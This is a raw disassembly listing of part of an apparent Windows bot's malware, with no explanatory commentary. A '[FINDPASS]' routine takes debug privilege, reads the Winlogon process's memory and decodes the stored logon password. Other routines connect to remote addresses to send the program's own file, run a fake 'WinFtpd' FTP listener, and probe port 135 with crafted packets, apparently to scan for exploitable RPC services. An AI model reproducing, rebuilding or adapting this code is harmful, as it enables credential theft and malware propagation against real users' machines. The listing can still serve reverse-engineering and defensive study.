call sub_414F66
pop ecx
push eax
call sub_414EE0
test eax, eax
pop ecx
pop ecx
jnz short loc_403331
push offset aMsgina ; "MSGINA"
push [esp+2Ch+var_18]
call sub_414F66
pop ecx
push eax
call sub_414EE0
test eax, eax
pop ecx
pop ecx
jnz short loc_40330F
mov eax, [ebx+4]
mov [esp+28h+var_4], eax
loc_40330F: ; CODE XREF: sub_4031AF+157�j
inc [esp+28h+var_10]
mov eax, [esp+28h+var_10]
cmp eax, [esp+28h+var_8]
jb short loc_4032CA
loc_40331D: ; CODE XREF: sub_4031AF+10F�j
test edi, edi
jz short loc_403328
push edi
call dword_434F40
loc_403328: ; CODE XREF: sub_4031AF+170�j
mov edi, [esp+28h+var_4]
jmp loc_40329E
; ---------------------------------------------------------------------------
loc_403331: ; CODE XREF: sub_4031AF+13C�j
xor eax, eax
jmp loc_4032AC
sub_4031AF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403338 proc near ; CODE XREF: sub_40378E+F0�p
var_68 = byte ptr -68h
var_64 = dword ptr -64h
var_44 = byte ptr -44h
var_38 = dword ptr -38h
var_33 = byte ptr -33h
var_2F = byte ptr -2Fh
var_28 = byte ptr -28h
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 68h
push esi
push [ebp+arg_0]
xor esi, esi
push esi
push 410h
mov [ebp+var_14], esi
call ds:dword_420078 ; OpenProcess
cmp eax, esi
mov [ebp+var_8], eax
jnz short loc_403361
xor eax, eax
jmp loc_4034D3
; ---------------------------------------------------------------------------
loc_403361: ; CODE XREF: sub_403338+20�j
mov eax, [ebp+arg_4]
push ebx
mov [eax], esi
push edi
lea eax, [ebp+var_68]
push eax
call ds:dword_420074 ; GetSystemInfo
push [ebp+var_64]
mov [ebp+var_C], esi
mov esi, ds:dword_420060
push 8
call esi ; GetProcessHeap
mov edi, ds:dword_42005C
push eax
call edi ; RtlAllocateHeap
mov ebx, ds:dword_420070
lea ecx, [ebp+var_C]
push ecx
push [ebp+var_64]
mov [ebp+var_4], eax
push eax
push 7FFDF000h
push [ebp+var_8]
call ebx ; ReadProcessMemory
test eax, eax
jnz short loc_4033B1
xor esi, esi
jmp loc_4034C6
; ---------------------------------------------------------------------------
loc_4033B1: ; CODE XREF: sub_403338+70�j
push 1Ch
lea eax, [ebp+var_44]
push eax
mov eax, [ebp+var_4]
push dword ptr [eax+18h]
push [ebp+var_8]
call ds:dword_42006C ; VirtualQueryEx
test eax, eax
jz loc_4034B5
test [ebp+var_33], 10h
jz loc_4034B5
test [ebp+var_2F], 1
jnz loc_4034B5
push [ebp+var_38]
push 8
call esi ; GetProcessHeap
push eax
call edi ; RtlAllocateHeap
mov edi, eax
lea eax, [ebp+var_C]
push eax
push [ebp+var_38]
mov eax, [ebp+var_4]
push edi
push dword ptr [eax+18h]
mov [ebp+var_10], edi
push [ebp+var_8]
call ebx ; ReadProcessMemory
test eax, eax
jz loc_4034B5
loc_40340C: ; CODE XREF: sub_403338+108�j
push edi
push offset dword_433F30
call sub_41F3DC
test eax, eax
pop ecx
pop ecx
jnz short loc_403434
lea eax, [edi+200h]
push eax
push offset dword_434738
call sub_41F3DC
test eax, eax
pop ecx
pop ecx
jz short loc_403444
loc_403434: ; CODE XREF: sub_403338+E3�j
mov eax, [ebp+var_38]
mov ecx, [ebp+var_10]
inc edi
inc edi
add eax, ecx
cmp edi, eax
jb short loc_40340C
jmp short loc_4034B5
; ---------------------------------------------------------------------------
loc_403444: ; CODE XREF: sub_403338+FA�j
test edi, edi
jz short loc_4034B5
lea eax, [ebp+var_18]
push eax
lea eax, [edi+410h]
push eax
call ds:dword_420068 ; FileTimeToLocalFileTime
test eax, eax
jz short loc_403481
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_18]
push eax
call ds:dword_420064 ; FileTimeToSystemTime
test eax, eax
jz short loc_403481
mov ecx, [ebp+arg_4]
xor eax, eax
mov al, [edi+42Ch]
shr eax, 1
and eax, 7Fh
mov [ecx], eax
loc_403481: ; CODE XREF: sub_403338+123�j
; sub_403338+135�j
movzx eax, byte ptr [edi+42Dh]
mov dword_434F50, eax
mov eax, [ebp+var_4]
mov eax, [eax+18h]
sub eax, [ebp+var_10]
mov [ebp+var_14], 1
lea eax, [eax+edi+434h]
add edi, 434h
mov dword_434F48, eax
mov dword_434F4C, edi
loc_4034B5: ; CODE XREF: sub_403338+90�j
; sub_403338+9A�j ...
push [ebp+var_4]
push 0
call esi ; GetProcessHeap
push eax
call ds:dword_420058 ; RtlFreeHeap
mov esi, [ebp+var_14]
loc_4034C6: ; CODE XREF: sub_403338+74�j
push [ebp+var_8]
call ds:dword_42003C ; CloseHandle
pop edi
mov eax, esi
pop ebx
loc_4034D3: ; CODE XREF: sub_403338+24�j
pop esi
leave
retn
sub_403338 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4034D6 proc near ; CODE XREF: sub_40378E:loc_403885�p
var_50 = byte ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_2C = byte ptr -2Ch
var_20 = dword ptr -20h
var_1B = byte ptr -1Bh
var_17 = byte ptr -17h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 50h
push [ebp+arg_0]
push 0
push 410h
call ds:dword_420078 ; OpenProcess
test eax, eax
mov [ebp+var_4], eax
jnz short loc_4034F5
leave
retn
; ---------------------------------------------------------------------------
loc_4034F5: ; CODE XREF: sub_4034D6+1B�j
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
push ebx
push esi
push edi
lea eax, [ebp+var_50]
push eax
call ds:dword_420074 ; GetSystemInfo
mov eax, [ebp+var_44]
mov ebx, [ebp+var_48]
cmp ebx, eax
mov [ebp+var_10], eax
jnb loc_4035B5
mov edi, ds:dword_420060
loc_40351F: ; CODE XREF: sub_4034D6+D9�j
push 1Ch
lea eax, [ebp+var_2C]
push eax
push ebx
push [ebp+var_4]
call ds:dword_42006C ; VirtualQueryEx
test eax, eax
jz short loc_4035A3
test [ebp+var_1B], 10h
mov eax, [ebp+var_20]
mov [ebp+var_8], eax
jz short loc_4035A9
test [ebp+var_17], 1
jnz short loc_4035A9
push eax
push 8
call edi ; GetProcessHeap
push eax
call ds:dword_42005C ; RtlAllocateHeap
and [ebp+var_C], 0
mov esi, eax
lea eax, [ebp+var_C]
push eax
push [ebp+var_20]
push esi
push ebx
push [ebp+var_4]
call ds:dword_420070 ; ReadProcessMemory
test eax, eax
jz short loc_403595
push offset dword_433F30
push esi
call sub_41F3DC
test eax, eax
pop ecx
pop ecx
jnz short loc_403595
lea eax, [esi+400h]
push offset dword_434738
push eax
call sub_41F3DC
test eax, eax
pop ecx
pop ecx
jz short loc_4035C7
loc_403595: ; CODE XREF: sub_4034D6+95�j
; sub_4034D6+A6�j
push esi
push 0
call edi ; GetProcessHeap
push eax
call ds:dword_420058 ; RtlFreeHeap
jmp short loc_4035A9
; ---------------------------------------------------------------------------
loc_4035A3: ; CODE XREF: sub_4034D6+5B�j
mov eax, [ebp+var_4C]
mov [ebp+var_8], eax
loc_4035A9: ; CODE XREF: sub_4034D6+67�j
; sub_4034D6+6D�j ...
add ebx, [ebp+var_8]
cmp ebx, [ebp+var_10]
jb loc_40351F
loc_4035B5: ; CODE XREF: sub_4034D6+3D�j
xor esi, esi
loc_4035B7: ; CODE XREF: sub_4034D6+123�j
push [ebp+var_4]
call ds:dword_42003C ; CloseHandle
pop edi
mov eax, esi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4035C7: ; CODE XREF: sub_4034D6+BD�j
add ebx, 800h
lea eax, [esi+800h]
xor ecx, ecx
mov dword_434F48, ebx
mov dword_434F4C, eax
cmp [eax], cl
jnz short loc_4035E9
cmp [eax+1], cl
jz short loc_4035F1
loc_4035E9: ; CODE XREF: sub_4034D6+10C�j
; sub_4034D6+119�j
inc ecx
inc eax
inc eax
cmp byte ptr [eax], 0
jnz short loc_4035E9
loc_4035F1: ; CODE XREF: sub_4034D6+111�j
mov eax, [ebp+arg_4]
xor esi, esi
mov [eax], ecx
inc esi
jmp short loc_4035B7
sub_4034D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4035FB proc near ; CODE XREF: sub_40378E+134�p
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, dword_434F44
add eax, eax
push ebx
mov ebx, ds:dword_420060
mov [ebp+var_8], ax
add eax, 2
push esi
mov [ebp+var_6], ax
movzx eax, ax
push edi
push eax
push 8
call ebx ; GetProcessHeap
push eax
call ds:dword_42005C ; RtlAllocateHeap
mov ecx, dword_434F44
mov esi, dword_434F4C
mov edi, eax
lea eax, [ebp+var_8]
push eax
mov [ebp+var_4], edi
xor eax, eax
rep movsw
mov al, byte ptr dword_434F50
push eax
call dword_434734
push [ebp+var_4]
mov esi, offset dword_434F58
push offset dword_433F30
push offset dword_434738
push [ebp+arg_0]
push offset aFindpassTheWin ; "[FINDPASS]: The Windows logon (Pid: <%d"...
push 200h
push esi
call sub_41466D
add esp, 1Ch
push [ebp+var_4]
push 0
call ebx ; GetProcessHeap
push eax
call ds:dword_420058 ; RtlFreeHeap
pop edi
mov eax, esi
pop esi
pop ebx
leave
retn
sub_4035FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40368D proc near ; CODE XREF: sub_40378E:loc_4038C9�p
var_C = word ptr -0Ch
var_A = word ptr -0Ah
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, dword_434F44
add eax, eax
push ebx
mov [ebp+var_C], ax
add eax, 2
push esi
mov [ebp+var_A], ax
movzx eax, ax
push edi
push eax
push 8
call ds:dword_420060 ; GetProcessHeap
push eax
call ds:dword_42005C ; RtlAllocateHeap
and [ebp+var_4], 0
mov [ebp+var_8], eax
mov ebx, offset dword_435158
loc_4036C7: ; CODE XREF: sub_40368D+E2�j
mov ecx, dword_434F44
mov esi, dword_434F4C
mov edi, [ebp+var_8]
lea eax, [ebp+var_C]
push eax
push [ebp+var_4]
rep movsw
call dword_434734
mov eax, dword_434F44
mov esi, [ebp+var_8]
xor edx, edx
inc edx
xor edi, edi
test eax, eax
jbe short loc_403720
loc_4036F7: ; CODE XREF: sub_40368D+8D�j
test edx, edx
jz short loc_403745
mov cl, [esi]
test cl, cl
jz short loc_403713
cmp byte ptr [esi+1], 0
jnz short loc_403713
cmp cl, 20h
jnb short loc_40370E
xor edx, edx
loc_40370E: ; CODE XREF: sub_40368D+7D�j
cmp cl, 7Eh
jbe short loc_403715
loc_403713: ; CODE XREF: sub_40368D+72�j
; sub_40368D+78�j
xor edx, edx
loc_403715: ; CODE XREF: sub_40368D+84�j
inc esi
inc esi
inc edi
cmp edi, eax
jb short loc_4036F7
test edx, edx
jz short loc_403745
loc_403720: ; CODE XREF: sub_40368D+68�j
push [ebp+var_8]
push offset dword_433F30
push offset dword_434738
push [ebp+arg_0]
push offset aFindpassTheWin ; "[FINDPASS]: The Windows logon (Pid: <%d"...
push 200h
push ebx
call sub_41466D
add esp, 1Ch
jmp short loc_403765
; ---------------------------------------------------------------------------
loc_403745: ; CODE XREF: sub_40368D+6C�j
; sub_40368D+91�j
push offset dword_433F30
push offset dword_434738
push [ebp+arg_0]
push offset aFindpassTheW_0 ; "[FINDPASS]: The Windows logon (Pid: <%d"...
push 200h
push ebx
call sub_41466D
add esp, 18h
loc_403765: ; CODE XREF: sub_40368D+B6�j
inc [ebp+var_4]
cmp [ebp+var_4], 0FFh
jbe loc_4036C7
push [ebp+var_8]
push 0
call ds:dword_420060 ; GetProcessHeap
push eax
call ds:dword_420058 ; RtlFreeHeap
pop edi
pop esi
mov eax, ebx
pop ebx
leave
retn
sub_40368D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_40378E proc near ; DATA XREF: sub_4089DC+4109�o
var_29C = byte ptr -29Ch
var_9C = dword ptr -9Ch
var_98 = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 29Ch
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 25h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_9C]
rep movsd
xor esi, esi
inc esi
mov [eax+90h], esi
call sub_4115A4
cmp eax, esi
mov [ebp+74h+var_4], eax
jz short loc_4037CD
cmp eax, 2
jz short loc_4037CD
push offset aFindpassOnlySu ; "[FINDPASS]: Only supported on Windows N"...
jmp loc_40390A
; ---------------------------------------------------------------------------
loc_4037CD: ; CODE XREF: sub_40378E+2E�j
; sub_40378E+33�j
push esi
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_40815F
test eax, eax
pop ecx
pop ecx
jz loc_403905
push offset aNtdll_dll ; "NTDLL.DLL"
call ds:dword_420088 ; LoadLibraryA
mov esi, ds:dword_420084
mov edi, eax
push offset aNtquerysystemi ; "NtQuerySystemInformation"
push edi
mov [ebp+74h+var_8], edi
call esi ; GetProcAddress
push offset aRtlcreatequery ; "RtlCreateQueryDebugBuffer"
push edi
mov dword_434730, eax
call esi ; GetProcAddress
push offset aRtlqueryproces ; "RtlQueryProcessDebugInformation"
push edi
mov dword_434F38, eax
call esi ; GetProcAddress
push offset aRtldestroyquer ; "RtlDestroyQueryDebugBuffer"
push edi
mov dword_434F3C, eax
call esi ; GetProcAddress
push offset aRtlrundecodeun ; "RtlRunDecodeUnicodeString"
push edi
mov dword_434F40, eax
call esi ; GetProcAddress
mov dword_434734, eax
call sub_4031AF
test eax, eax
mov [ebp+74h+arg_0], eax
jz loc_4038D9
mov esi, ds:dword_420080
mov edi, 400h
push edi
mov ebx, offset dword_433F30
push ebx
push offset aUsername ; "USERNAME"
call esi ; GetEnvironmentVariableW
push edi
mov edi, offset dword_434738
push edi
push offset aUserdomain ; "USERDOMAIN"
call esi ; GetEnvironmentVariableW
cmp [ebp+74h+var_4], 1
push offset dword_434F44
push [ebp+74h+arg_0]
jnz short loc_403885
call sub_403338
jmp short loc_40388A
; ---------------------------------------------------------------------------
loc_403885: ; CODE XREF: sub_40378E+EE�j
call sub_4034D6
loc_40388A: ; CODE XREF: sub_40378E+F5�j
test eax, eax
pop ecx
pop ecx
jz short loc_4038D2
cmp dword_434F44, 0
jnz short loc_4038B9
push ebx
push edi
push [ebp+74h+arg_0]
lea eax, [ebp+74h+var_29C]
push offset aFindpassTheW_1 ; "[FINDPASS]: The Windows logon (Pid: <%d"...
push 200h
push eax
call sub_41466D
add esp, 18h
jmp short loc_4038EC
; ---------------------------------------------------------------------------
loc_4038B9: ; CODE XREF: sub_40378E+109�j
cmp [ebp+74h+var_4], 1
push [ebp+74h+arg_0]
jnz short loc_4038C9
call sub_4035FB
jmp short loc_4038CE
; ---------------------------------------------------------------------------
loc_4038C9: ; CODE XREF: sub_40378E+132�j
call sub_40368D
loc_4038CE: ; CODE XREF: sub_40378E+139�j
pop ecx
push eax
jmp short loc_4038DE
; ---------------------------------------------------------------------------
loc_4038D2: ; CODE XREF: sub_40378E+100�j
push offset aFindpassUnable ; "[FINDPASS]: Unable to find the password"...
jmp short loc_4038DE
; ---------------------------------------------------------------------------
loc_4038D9: ; CODE XREF: sub_40378E+B5�j
push offset aFindpassUnab_0 ; "[FINDPASS]: Unable to find Winlogon Pro"...
loc_4038DE: ; CODE XREF: sub_40378E+142�j
; sub_40378E+149�j
lea eax, [ebp+74h+var_29C]
push eax
call sub_414415
pop ecx
pop ecx
loc_4038EC: ; CODE XREF: sub_40378E+129�j
push 0
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_40815F
pop ecx
pop ecx
push [ebp+74h+var_8]
call ds:dword_42007C ; FreeLibrary
jmp short loc_403918
; ---------------------------------------------------------------------------
loc_403905: ; CODE XREF: sub_40378E+4E�j
push offset aFindpassFailed ; "[FINDPASS]: Failed to enable Debug Priv"...
loc_40390A: ; CODE XREF: sub_40378E+3A�j
lea eax, [ebp+74h+var_29C]
push eax
call sub_414415
pop ecx
pop ecx
loc_403918: ; CODE XREF: sub_40378E+175�j
xor esi, esi
cmp [ebp+74h+var_10], esi
jnz short loc_403939
push esi
push [ebp+74h+var_14]
lea eax, [ebp+74h+var_29C]
push eax
lea eax, [ebp+74h+var_98]
push eax
push [ebp+74h+var_9C]
call sub_4056BF
add esp, 14h
loc_403939: ; CODE XREF: sub_40378E+18F�j
lea eax, [ebp+74h+var_29C]
push eax
call sub_401EFF
push [ebp+74h+var_18]
call sub_41255E
pop ecx
pop ecx
push esi
call ds:dword_420014 ; ExitThread
int 3 ; Trap to Debugger
sub_40378E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403957 proc near ; CODE XREF: sub_40398A+11C�p
; sub_40398A+145�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov edx, [ebp+arg_4]
sub edx, [ebp+arg_C]
push ebx
push esi
xor eax, eax
test edx, edx
push edi
jle short loc_40397F
loc_403969: ; CODE XREF: sub_403957+26�j
mov esi, [ebp+arg_0]
mov ecx, [ebp+arg_C]
mov edi, [ebp+arg_8]
add esi, eax
xor ebx, ebx
repe cmpsb
jz short loc_403986
inc eax
cmp eax, edx
jl short loc_403969
loc_40397F: ; CODE XREF: sub_403957+10�j
xor al, al
loc_403981: ; CODE XREF: sub_403957+31�j
pop edi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_403986: ; CODE XREF: sub_403957+21�j
mov al, 1
jmp short loc_403981
sub_403957 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40398A proc near ; CODE XREF: .text:00413522�p
var_2010 = byte ptr -2010h
var_200E = byte ptr -200Eh
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 2010h
call sub_414630
mov eax, [ebp+arg_4]
dec eax
jz short loc_4039C7
dec eax
jz short loc_4039A5
dec eax
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_4039A5: ; CODE XREF: sub_40398A+14�j
push 3
push 1388h
push [ebp+arg_0]
call dword_43587C ; inet_addr
push eax
call sub_4018CA
add esp, 0Ch
neg eax
sbb eax, eax
and eax, 3
leave
retn
; ---------------------------------------------------------------------------
loc_4039C7: ; CODE XREF: sub_40398A+11�j
push ebx
push esi
push 6
push 1
push 2
call dword_435808 ; socket
mov esi, eax
or ebx, 0FFFFFFFFh
xor eax, eax
cmp esi, ebx
mov [ebp+arg_4], esi
jz loc_403AEC
push edi
lea edi, [ebp+var_10]
stosd
stosd
stosd
stosd
push 87h
mov [ebp+var_10], 2
call dword_435954 ; htons
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_407BFF
pop ecx
mov [ebp+var_C], eax
push 10h
lea eax, [ebp+var_10]
push eax
push esi
call dword_4357C0 ; connect
cmp eax, ebx
jz short loc_403A36
xor edi, edi
push edi
push 48h
push offset dword_42B3E0
push esi
call dword_43589C ; send
cmp eax, ebx
jnz short loc_403A3D
loc_403A36: ; CODE XREF: sub_40398A+95�j
; sub_40398A+CC�j ...
xor esi, esi
jmp loc_403AE0
; ---------------------------------------------------------------------------
loc_403A3D: ; CODE XREF: sub_40398A+AA�j
push edi
mov esi, 2000h
push esi
lea eax, [ebp+var_2010]
push eax
push [ebp+arg_4]
call dword_43577C ; recv
cmp eax, ebx
jz short loc_403A36
cmp [ebp+var_200E], 0Ch
jnz short loc_403A36
push edi
push 18h
push offset dword_42B42C
push [ebp+arg_4]
call dword_43589C ; send
cmp eax, ebx
jz short loc_403A36
push edi
push esi
lea eax, [ebp+var_2010]
push eax
push [ebp+arg_4]
call dword_43577C ; recv
mov esi, eax
cmp esi, ebx
jz short loc_403A36
cmp [ebp+var_200E], 2
jnz short loc_403A36
push 10h
push offset loc_42B448
lea eax, [ebp+var_2010]
push esi
push eax
call sub_403957
add esp, 10h
test al, al
jz short loc_403AC0
xor eax, eax
cmp esi, 12Ch
setnl al
inc eax
jmp short loc_403ADE
; ---------------------------------------------------------------------------
loc_403AC0: ; CODE XREF: sub_40398A+126�j
push 10h
push offset dword_42B45C
lea eax, [ebp+var_2010]
push esi
push eax
call sub_403957
add esp, 10h
neg al
sbb eax, eax
and eax, 3
loc_403ADE: ; CODE XREF: sub_40398A+134�j
mov esi, eax
loc_403AE0: ; CODE XREF: sub_40398A+AE�j
push [ebp+arg_4]
call dword_435914 ; closesocket
mov eax, esi
pop edi
loc_403AEC: ; CODE XREF: sub_40398A+57�j
pop esi
pop ebx
leave
retn
sub_40398A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403AF0 proc near ; CODE XREF: sub_403BFF+4A2�p
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1A0h
lea eax, [ebp+var_1A0]
push eax
push 101h
call ds:dword_420200 ; WSAStartup
push 0
push 1
push 2
call ds:dword_420204 ; socket
push [ebp+arg_0]
mov dword_435358, eax
mov [ebp+var_10], 2
call ds:dword_420208 ; inet_addr
push [ebp+arg_4]
mov [ebp+var_C], eax
call ds:dword_42020C ; htons
mov [ebp+var_E], ax
push 10h
lea eax, [ebp+var_10]
push eax
push dword_435358
call ds:dword_420210 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_403B68
push dword_435358
call ds:dword_420214 ; closesocket
call ds:dword_420218 ; WSACleanup
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_403B68: ; CODE XREF: sub_403AF0+60�j
xor eax, eax
inc eax
leave
retn
sub_403AF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403B6D proc near ; CODE XREF: sub_403BFF+4AE�p
var_504 = byte ptr -504h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 504h
push esi
push 104h
lea eax, [ebp+var_104]
push eax
push 0
call ds:dword_420010 ; GetModuleFileNameA
lea eax, [ebp+var_104]
push offset dword_420978
push eax
call sub_414BF3
mov esi, eax
test esi, esi
pop ecx
pop ecx
jnz short loc_403BDA
jmp short loc_403BFC
; ---------------------------------------------------------------------------
loc_403BA6: ; CODE XREF: sub_403B6D+72�j
push 400h
lea eax, [ebp+var_504]
push 1
push eax
call sub_41499E
add esp, 10h
push 0
push eax
lea eax, [ebp+var_504]
push eax
push dword_435358
call ds:dword_4201FC ; send
push 0Ah
call ds:dword_420000 ; Sleep
loc_403BDA: ; CODE XREF: sub_403B6D+35�j
test byte ptr [esi+0Ch], 10h
push esi
jz short loc_403BA6
call sub_4147F3
pop ecx
push dword_435358
call ds:dword_420214 ; closesocket
call ds:dword_420218 ; WSACleanup
xor eax, eax
inc eax
loc_403BFC: ; CODE XREF: sub_403B6D+37�j
pop esi
leave
retn
sub_403B6D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_403BFF proc near ; DATA XREF: sub_401141+254�o
var_A6C = byte ptr -0A6Ch
var_8DC = byte ptr -8DCh
var_6DC = dword ptr -6DCh
var_6D8 = byte ptr -6D8h
var_4C4 = byte ptr -4C4h
var_444 = dword ptr -444h
var_440 = dword ptr -440h
var_438 = dword ptr -438h
var_334 = byte ptr -334h
var_2D0 = byte ptr -2D0h
var_29C = byte ptr -29Ch
var_238 = byte ptr -238h
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_124 = byte ptr -124h
var_F8 = byte ptr -0F8h
var_C4 = byte ptr -0C4h
var_AC = byte ptr -0ACh
var_48 = byte ptr -48h
var_38 = word ptr -38h
var_36 = word ptr -36h
var_34 = dword ptr -34h
var_28 = byte ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 0A6Ch
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
mov esi, eax
xor ebx, ebx
inc ebx
mov ecx, 0A9h
lea edi, [ebp+74h+var_6DC]
rep movsd
mov [eax+2A0h], ebx
lea eax, [ebp+74h+var_A6C]
push eax
xor esi, esi
push 101h
mov [ebp+74h+var_18], ebx
mov [ebp+74h+var_1C], ebx
mov [ebp+74h+var_228], esi
mov [ebp+74h+var_438], esi
call ds:dword_420200 ; WSAStartup
push esi
call sub_415250
push eax
call sub_4145C4
mov eax, [ebp+74h+arg_0]
mov eax, [eax+214h]
pop ecx
pop ecx
push esi
push ebx
push 2
mov dword_43535C, eax
call ds:dword_420204 ; socket
mov ebx, eax
push 4
lea eax, [ebp+74h+var_18]
push eax
push 4
push 0FFFFh
push ebx
mov [ebp+74h+var_8], ebx
call ds:dword_4201DC ; setsockopt
lea eax, [ebp+74h+var_1C]
push eax
push 8004667Eh
push ebx
call ds:dword_4201E0 ; ioctlsocket
xor eax, eax
mov ax, word ptr dword_43535C
mov [ebp+74h+var_38], 2
mov [ebp+74h+var_34], esi
push eax
call ds:dword_42020C ; htons
mov [ebp+74h+var_36], ax
push 10h
lea eax, [ebp+74h+var_38]
push eax
push ebx
call ds:dword_4201E4 ; bind
test eax, eax
jl loc_404199
push 0Ah
push ebx
call ds:dword_4201E8 ; listen
push 41h
pop ecx
xor eax, eax
push eax
push eax
push eax
lea eax, [ebp+74h+var_438]
mov [ebp+74h+var_224], ebx
mov [ebp+74h+var_4], ebx
push eax
inc ebx
lea esi, [ebp+74h+var_228]
lea edi, [ebp+74h+var_438]
mov [ebp+74h+var_228], 1
push ebx
rep movsd
call ds:dword_4201EC ; select
cmp eax, 0FFFFFFFFh
jz loc_404199
mov ebx, ds:dword_4201FC
loc_403D1E: ; CODE XREF: sub_403BFF+594�j
xor esi, esi
cmp [ebp+74h+var_4], esi
mov [ebp+74h+arg_0], esi
jl loc_404168
loc_403D2C: ; CODE XREF: sub_403BFF+563�j
push 19h
pop ecx
xor eax, eax
push 19h
lea edi, [ebp+74h+var_29C]
rep stosd
pop ecx
lea edi, [ebp+74h+var_AC]
rep stosd
lea eax, [ebp+74h+var_438]
push eax
push esi
call sub_41F3D0 ; __WSAFDIsSet
test eax, eax
jz loc_40415B
cmp esi, [ebp+74h+var_8]
jnz short loc_403DC6
push 10h
pop edi
lea eax, [ebp+74h+var_24]
push eax
lea eax, [ebp+74h+var_238]
push eax
push [ebp+74h+var_8]
mov [ebp+74h+var_24], edi
call ds:dword_4201F4 ; accept
cmp eax, 0FFFFFFFFh
jz loc_40415B
mov edx, [ebp+74h+var_228]
xor ecx, ecx
test edx, edx
jbe short loc_403D98
loc_403D8A: ; CODE XREF: sub_403BFF+197�j
cmp [ebp+ecx*4+74h+var_224], eax
jz short loc_403D98
inc ecx
cmp ecx, edx
jb short loc_403D8A
loc_403D98: ; CODE XREF: sub_403BFF+189�j
; sub_403BFF+192�j
cmp ecx, edx
jnz short loc_403DAE
cmp edx, 40h
jnb short loc_403DAE
mov [ebp+ecx*4+74h+var_224], eax
inc [ebp+74h+var_228]
loc_403DAE: ; CODE XREF: sub_403BFF+19B�j
; sub_403BFF+1A0�j
cmp eax, [ebp+74h+var_4]
jle short loc_403DB6
mov [ebp+74h+var_4], eax
loc_403DB6: ; CODE XREF: sub_403BFF+1B2�j
push 0
push edi
push offset a220Winftpd1_2 ; "220 WinFtpd 1.2\n"
push eax
call ebx ; send
jmp loc_40415B
; ---------------------------------------------------------------------------
loc_403DC6: ; CODE XREF: sub_403BFF+15A�j
push 0
push 64h
lea eax, [ebp+74h+var_29C]
push eax
push esi
call ds:dword_4201F8 ; recv
test eax, eax
jg short loc_403E24
mov ecx, [ebp+74h+var_228]
xor eax, eax
test ecx, ecx
jbe short loc_403E18
loc_403DE8: ; CODE XREF: sub_403BFF+1F5�j
cmp [ebp+eax*4+74h+var_224], esi
jz short loc_403E0D
inc eax
cmp eax, ecx
jb short loc_403DE8
jmp short loc_403E18
; ---------------------------------------------------------------------------
loc_403DF8: ; CODE XREF: sub_403BFF+211�j
mov ecx, [ebp+eax*4+74h+var_220]
mov [ebp+eax*4+74h+var_224], ecx
mov ecx, [ebp+74h+var_228]
inc eax
loc_403E0D: ; CODE XREF: sub_403BFF+1F0�j
dec ecx
cmp eax, ecx
jb short loc_403DF8
dec [ebp+74h+var_228]
loc_403E18: ; CODE XREF: sub_403BFF+1E7�j
; sub_403BFF+1F7�j
push esi
call ds:dword_420214 ; closesocket
jmp loc_40415B
; ---------------------------------------------------------------------------
loc_403E24: ; CODE XREF: sub_403BFF+1DB�j
lea eax, [ebp+74h+var_334]
push eax
lea eax, [ebp+74h+var_AC]
push eax
lea eax, [ebp+74h+var_29C]
push offset aSS_1 ; "%s %s"
push eax
call sub_4145F3
add esp, 10h
push 5
pop edx
